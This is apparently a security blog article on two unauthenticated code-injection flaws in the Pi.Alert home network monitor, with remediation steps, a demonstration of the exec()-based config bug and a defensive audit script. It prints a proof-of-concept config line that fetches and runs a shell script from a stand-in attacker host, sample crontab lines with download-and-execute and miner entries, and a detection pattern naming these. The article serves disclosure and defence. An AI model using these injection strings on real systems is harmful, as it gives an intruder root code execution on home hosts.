
Two Unauthenticated RCEs in Pi.Alert: CVE-2026-44887 / 44888 Hit Home Network Watchers

Pi.Alert, the home/SOHO Wi-Fi and LAN intruder detector, ships with two unauthenticated RCE flaws (CVE-2026-44887/44888, both CVSS 9.8). Web protection is disabled by default, letting any attacker write Python code into pialert.conf which the scan daemon then loads via exec(). Patched in the 2026-05-07 release.


Makoto Horikawa

Backend Engineer / AWS / Django

2026.05.28 · 6 min read

Two critical unauthenticated remote code execution flaws have been disclosed in Pi.Alert, the open-source tool used in homes and SOHO environments to watch which devices are connected to the local Wi-Fi. CVE-2026-44887 and CVE-2026-44888 both carry a CVSS score of 9.8. NVD formally published them on May 27, 2026, and they are fixed in the 2026-05-07 release.

Pi.Alert is designed to detect unknown devices joining your Wi-Fi and is a popular homelab project on Raspberry Pi. What is meant to be a watchdog protecting the home network turns into the opposite here: two Python code injection flaws in its configuration interface let an attacker plant arbitrary code into pialert.conf, which the scan daemon then loads through exec(). The watchdog becomes a foothold for the intruder.

The biggest issue is that web protection is disabled by default. The configuration key PIALERT_WEB_PROTECTION = False ships as the default value, on the assumption that the tool is only ever reachable from inside the home network. Because neither flaw requires authentication, anything that can reach the web UI can use them, and on a flat home LAN that already includes every device Pi.Alert is supposed to be watching, a compromised IoT gadget included. The moment a user sets up port forwarding or exposes the interface for remote work, the same RCE path also becomes reachable from the outside.

What Pi.Alert Is

Pi.Alert is an OSS project maintained by Germany-based leiweibau and is itself a fork of Pi-Alert, originally written by another developer, pucherot. The design is simple: it runs on a Raspberry Pi (or any Linux box) via Docker or a direct install, periodically enumerates LAN devices with arp-scan and nmap, and when a new MAC address shows up it sends an alert through Pushover, email, or Telegram.

Typical use cases include the following.

  • Home users watching for unknown MAC addresses on the home Wi-Fi, beyond the family's known phones and IoT devices
  • SOHO owners logging unauthorized connections to the office wireless LAN
  • Homelab enthusiasts running it continuously on a Raspberry Pi as one of the standard OSS picks
  • Rental property managers keeping tabs on shared Wi-Fi usage
  • Combining it with web service monitoring (health checks) to also do uptime monitoring of internal services

With more than 3,000 stars on GitHub and frequent mentions in r/selfhosted and the Home Assistant community, it is one of the go-to choices for home network monitoring. It is not a commercial product but open-source software that individuals run at their own risk, and it is exactly that pattern of individual operation that makes it an attractive target for attackers here.

CVE-2026-44887: Python Injection Through The Web Config Editor (CVSS 9.8)

CVE-2026-44887 stems from the fact that the configuration editor built into Pi.Alert's web admin panel writes user input into pialert.conf without sanitization. NVD classifies it as CWE-94 (Improper Control of Generation of Code).

The Pi.Alert configuration file is written as Python syntax, and the background scan daemon loads it at startup and on every scan cycle (typically every 3 to 5 minutes) through exec(open('pialert.conf').read()) or an equivalent call. There is no parser in between: whatever is on the right-hand side of each assignment is executed as Python with full access to the interpreter. If an attacker writes an arbitrary Python expression into that configuration file through the web admin panel, the daemon will evaluate it on its next cycle, with no further interaction needed.

The scan daemon usually runs as root, because it needs to perform ARP scans and other low-level network probing. The upshot is that an attacker who can post Python code through the web interface ends up able to execute it as root on that machine. The flaw was reported by aslein1413-sys, and the GHSA advisory records that the report was sent to the maintainer on May 8, 2026.

CVE-2026-44888: Missing Numeric Field Validation In SaveConfigFile() (CVSS 9.8)

CVE-2026-44888 is another code injection path into pialert.conf, but the entry point is different. The SaveConfigFile action in front/php/server/files.php writes user-supplied "numeric" fields straight into the configuration file without validating them, so an attacker can embed Python expressions inside values that are supposed to be numeric.

The two especially problematic keys are DB_PATH and LOG_PATH, which are written without quotes in the configuration file by design. Path strings should be string literals wrapped in quotes, but because they are written unquoted, an attacker can plant something like DB_PATH=__import__('os').system('curl attacker.com/sh|sh') and the scan daemon's Python interpreter will evaluate it as an expression and actually run the command on its next load. The GHSA advisory describes the structure of the PoC.

CVE             Attack point                        Injection method                                   CVSS
CVE-2026-44887  Web config editor                   Arbitrary Python expression written into           9.8
                                                    pialert.conf
CVE-2026-44888  SaveConfigFile "numeric" field      DB_PATH / LOG_PATH written unquoted, so the value   9.8
                                                    is evaluated as a Python expression

Both CVEs were reported by the same researcher, aslein1413-sys, and both trace back to a fundamental design choice in Pi.Alert's backend: reading the configuration file via exec(). The fix release (2026-05-07) bundles together proper quoting when writing the configuration file and turning web protection on by default.
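The following is an added example, not code from Pi.Alert or from the advisories, that reproduces the mechanism behind both CVEs in miniature: a writer that interpolates a value unquoted (the SaveConfigFile behaviour described above) feeding a loader that exec()s the file (the daemon behaviour), next to the two-part fix the release is described as shipping, quoting on write and a loader that only accepts literals. The key names DB_PATH, LOG_PATH and PIALERT_WEB_PROTECTION are from the article; PIALERT_WEB_PASSWORD, the schema, the function names and the payload are this example's own assumptions. The payload deliberately calls os.getpid() instead of shelling out, so that running the block proves code execution without doing anything harmful.

```python
"""Added example (not Pi.Alert code): exec()-based config loading versus a
literal-only loader, and unquoted versus quoted config writing."""
import ast
import re

# Types each key may hold. Anything not listed is rejected (fail closed).
# Key list is an assumption for this example; only DB_PATH, LOG_PATH and
# PIALERT_WEB_PROTECTION are named in the article.
CONFIG_SCHEMA = {
    "DB_PATH": str,
    "LOG_PATH": str,
    "PIALERT_WEB_PROTECTION": bool,
    "PIALERT_WEB_PASSWORD": str,
}

LINE_RE = re.compile(r"^([A-Z][A-Z0-9_]*)\s*=\s*(.+?)\s*$")


def write_line_unquoted(key, value):
    """Pre-fix behaviour as the article describes it: the value is pasted in
    verbatim, so a value that looks like Python *is* Python once loaded."""
    return f"{key}={value}"


def write_line_quoted(key, value):
    """The fix: emit a Python literal. repr() escapes quotes and backslashes,
    so a hostile path can only ever come back as a string."""
    if type(value) not in (str, bool, int):
        raise TypeError(f"unsupported config value type for {key}")
    return f"{key}={value!r}"


def load_config_exec(text):
    """Mirror of the vulnerable loader: exec() the whole file. Every
    right-hand side runs as Python with the full builtins available."""
    ns = {}
    exec(text, ns)  # this line is the bug being demonstrated
    ns.pop("__builtins__", None)
    return ns


def load_config_safe(text):
    """Hardened loader: one KEY=literal per line, right-hand side parsed with
    ast.literal_eval (no names, calls or attribute access), type-checked
    against the schema. bool is checked exactly because it subclasses int."""
    cfg = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a KEY=value assignment")
        key, rhs = m.groups()
        expected = CONFIG_SCHEMA.get(key)
        if expected is None:
            raise ValueError(f"line {lineno}: unknown key {key}")
        try:
            value = ast.literal_eval(rhs)
        except (ValueError, SyntaxError):
            raise ValueError(f"line {lineno}: {key} is not a literal") from None
        if type(value) is not expected:
            raise ValueError(f"line {lineno}: {key} must be {expected.__name__}")
        cfg[key] = value
    return cfg


# Constructed stand-in for the PoC shape in the article. The real one calls
# os.system(); this only proves that code ran by returning the daemon's PID.
PAYLOAD = "__import__('os').getpid()"

if __name__ == "__main__":
    bad = write_line_unquoted("DB_PATH", PAYLOAD)
    print(bad, "->", load_config_exec(bad)["DB_PATH"])    # an int: code ran
    good = write_line_quoted("DB_PATH", PAYLOAD)
    print(good, "->", load_config_safe(good)["DB_PATH"])  # the string, inert
    try:
        load_config_safe(bad)
    except ValueError as err:
        print("rejected:", err)
```

Run stand-alone, the unquoted line comes back as a process ID, showing the expression was executed, while the quoted line round-trips the same text as a harmless string and the literal-only loader refuses the unquoted line outright. Either half of the fix alone is enough to stop this particular injection; shipping both is defence in depth, since quoting protects against a buggy writer and the literal-only loader protects against any other way of editing the file.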

Why Home And SOHO Watchers Attract Attackers

The motivation for targeting home network monitoring tools like Pi.Alert is easy to overlook but quite clear.

First, these tools usually run as root and sit in a position where they can see the entire home network. For an attacker that is an extremely valuable launchpad for reconnaissance and lateral movement across every device on the home network: PCs, phones, IoT devices, NAS boxes, and so on.

Second, because they are run by individuals, security patches tend not to land. People who run Pi.Alert often leave their home Raspberry Pi running for months or years without updating it. Unlike commercial vendor products, the auto-update story is weak, and there is a long lag between CVE disclosure and patches actually being applied.

Third, more of these boxes are exposed for remote access than you would expect. Technically inclined homelab users frequently want to "check on the home network from outside" and end up publishing Pi.Alert's web UI through Cloudflare Tunnel, a reverse proxy, or even direct port forwarding. Overlay networks such as Tailscale limit exposure to enrolled devices, but every one of those devices then becomes a path to an unauthenticated UI. That is exactly the moment when the default "web protection disabled" becomes fatal.

Fourth, they are "just right as disposable" hosts for mining, botnets, and proxies. From an attacker's perspective, an always-on Linux box on a home network (often a Raspberry Pi) is an ideal "light and quiet" resource for crypto miners, proxy bots, or DDoS staging. Compromising a Pi.Alert host lets them quietly use the home's bandwidth and CPU for a long time.

What To Do Now

1. Update Pi.Alert to the latest version (2026-05-07 release or later). If you are running it under Docker, pull the latest image for the fork you actually run (the article's examples are docker pull jokobsk/pi.alert and docker pull leiweibau/pi.alert) and recreate the container. If you are running from a Git clone, git pull and then restart the scan daemon. Confirm the running version afterwards rather than trusting that the pull happened.

2. Set PIALERT_WEB_PROTECTION to True. Edit pialert.conf directly (/config/pialert.conf in the Docker layout, config/pialert.conf under the install directory on a bare install) and change it to PIALERT_WEB_PROTECTION = True. This requires authentication to access the web UI. The setting only means anything if PIALERT_WEB_PASSWORD is also changed from its documented default hash to the SHA-256 hash of a password of your own. The fixed release turns protection on by default for new installs, but an upgrade may leave your existing pialert.conf with the old value, so set it explicitly and verify.

3. Take the web UI off the public internet for now. If you have been exposing it via Cloudflare Tunnel, Ngrok, or similar, take it down temporarily until you have updated and verified the authentication settings. Switching to SSH or VPN-based access is worth considering as the new normal.

4. Check the Pi.Alert host for signs of compromise. Start with pialert.conf itself: since the attack works by writing Python into the file, any right-hand side that is not a plain literal (a string, number or True/False) is evidence that the injection already happened. Then look in /tmp, /var/tmp, and user home directories for unfamiliar executables, and review root's and the service user's crontabs and /etc/cron.d for entries you did not create. On Raspberry Pi hosts in particular, crypto miners (such as XMRig) and reverse shell scripts often get left behind. Also check ps aux for unfamiliar processes and ss -tnp (or netstat -tnp) for unfamiliar outbound connections.

5. Treat everything Pi.Alert held as exposed. If the compromise succeeded, every MAC address history and device scan record Pi.Alert collected may have leaked. Home network topology might seem low-sensitivity at a glance, but when combined with visitor device history, occupancy patterns, and IoT model fingerprinting, it is the kind of information that can feed a physical intrusion plan. Inventory the devices in the home and change the Wi-Fi password if necessary.

6. Even at home or SOHO scale, think about "protecting the watchdog." The pattern where the monitoring tool itself becomes the attack surface applies just as much to enterprise SIEM or EDR. We have covered the same pattern in Trivy compromised twice in a row and in the same-day coverage of Dalfox CVE-2026-45087. For home security gear too, regular updates and minimal external exposure are basic maintenance hygiene.
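As an added example that is not part of the original article or of Pi.Alert, the check from steps 2 and 4 above in one script: it audits a pialert.conf for injected expressions, for web protection left off and for the default password hash, and flags crontab lines carrying download-and-execute or miner indicators. The sample config and crontab are constructed for the example (198.51.100.7 is a documentation address). The default password of 123456 hashed with SHA-256 into PIALERT_WEB_PASSWORD is taken from upstream Pi.Alert documentation as this author recalls it and is an assumption to verify against your fork.

```python
"""Added example (not Pi.Alert code): triage a Pi.Alert host's config and
crontab for the injection described in the article and for weak settings."""
import ast
import hashlib
import re

ASSIGN_RE = re.compile(r"^([A-Z][A-Z0-9_]*)\s*=\s*(.+?)\s*$")

# Assumption: upstream documents 123456 as the default web password and
# stores its SHA-256 hex digest in PIALERT_WEB_PASSWORD.
DEFAULT_PASSWORD_HASH = hashlib.sha256(b"123456").hexdigest()

# Common shapes of an attacker-added cron line: curl/wget piped to a shell,
# base64-decoded payloads, XMRig, bash /dev/tcp reverse shells.
CRON_IOC_RE = re.compile(
    r"(curl|wget)\b[^|;&]*\|\s*(ba)?sh|base64\s+(-d|--decode)|xmrig|/dev/tcp/",
    re.IGNORECASE,
)


def audit_config(text):
    """Return (severity, message) findings for the text of a pialert.conf.
    A right-hand side that ast.literal_eval cannot parse is not a value the
    web editor should ever have written; with exec() loading it is code."""
    findings = []
    seen = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ASSIGN_RE.match(line)
        if not m:
            findings.append(("high", f"line {lineno}: not a KEY=value line: {line!r}"))
            continue
        key, rhs = m.groups()
        try:
            seen[key] = ast.literal_eval(rhs)
        except (ValueError, SyntaxError):
            findings.append(("high", f"line {lineno}: {key} is an expression, not a literal: {rhs!r}"))
    if seen.get("PIALERT_WEB_PROTECTION") is not True:
        findings.append(("high", "PIALERT_WEB_PROTECTION is not True: web UI is unauthenticated"))
    if seen.get("PIALERT_WEB_PASSWORD") == DEFAULT_PASSWORD_HASH:
        findings.append(("medium", "PIALERT_WEB_PASSWORD is the documented default (123456)"))
    return findings


def audit_cron(lines):
    """Return the crontab lines that match a download-and-execute or miner
    indicator. Review every hit by hand; this is a triage filter, not proof."""
    return [line for line in lines if CRON_IOC_RE.search(line)]


# Constructed sample data: a tampered config and a crontab with two dropped jobs.
SAMPLE_CONF = f"""\
# constructed pialert.conf showing a tampered DB_PATH line
PIALERT_WEB_PROTECTION = False
PIALERT_WEB_PASSWORD = '{DEFAULT_PASSWORD_HASH}'
DB_PATH=__import__('os').system('curl 198.51.100.7/sh|sh')
LOG_PATH = '/home/pi/pialert/log'
"""

SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "*/5 * * * * /usr/bin/python3 /home/pi/pialert/back/pialert.py 1",
    "@reboot curl -fsSL http://198.51.100.7/x.sh | sh",
    "0 3 * * * /tmp/.cache/xmrig --config /tmp/.cache/c.json",
]

if __name__ == "__main__":
    for severity, message in audit_config(SAMPLE_CONF):
        print(f"[{severity}] {message}")
    for line in audit_cron(SAMPLE_CRONTAB):
        print("[cron] suspicious:", line)
```

On a real host, read the config with open(path).read() and the crontabs from the output of crontab -l for root and the service user plus the files in /etc/cron.d. A finding from audit_config on a live box means the host should be rebuilt rather than cleaned: once the daemon has executed attacker code as root, the config file is no longer the only thing that was changed.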

CISA KEV Status And Related Coverage

As of May 28, 2026, CVE-2026-44887 and CVE-2026-44888 are not listed in the CISA KEV catalog. Pi.Alert is a small OSS project run mostly in homes and by individuals, so it falls outside the primary scope of a KEV catalog aimed at U.S. federal agencies. But this is exactly the kind of software that botnet operators and crypto miner distributors love to abuse as a small, ideal target.

We continuously track the list of CVEs that CISA confirms as being actively exploited on our CISA KEV dashboard (Japanese). For CVE watch on home and SOHO OSS (Pi-hole, Home Assistant, Plex, Jellyfin, Nextcloud, and so on), our OSS supply chain scanner shows the latest status. Managing CVEs for self-hosted OSS like Pi.Alert with the same discipline you would apply to enterprise products is the key to keeping attackers from setting up long-term residency.
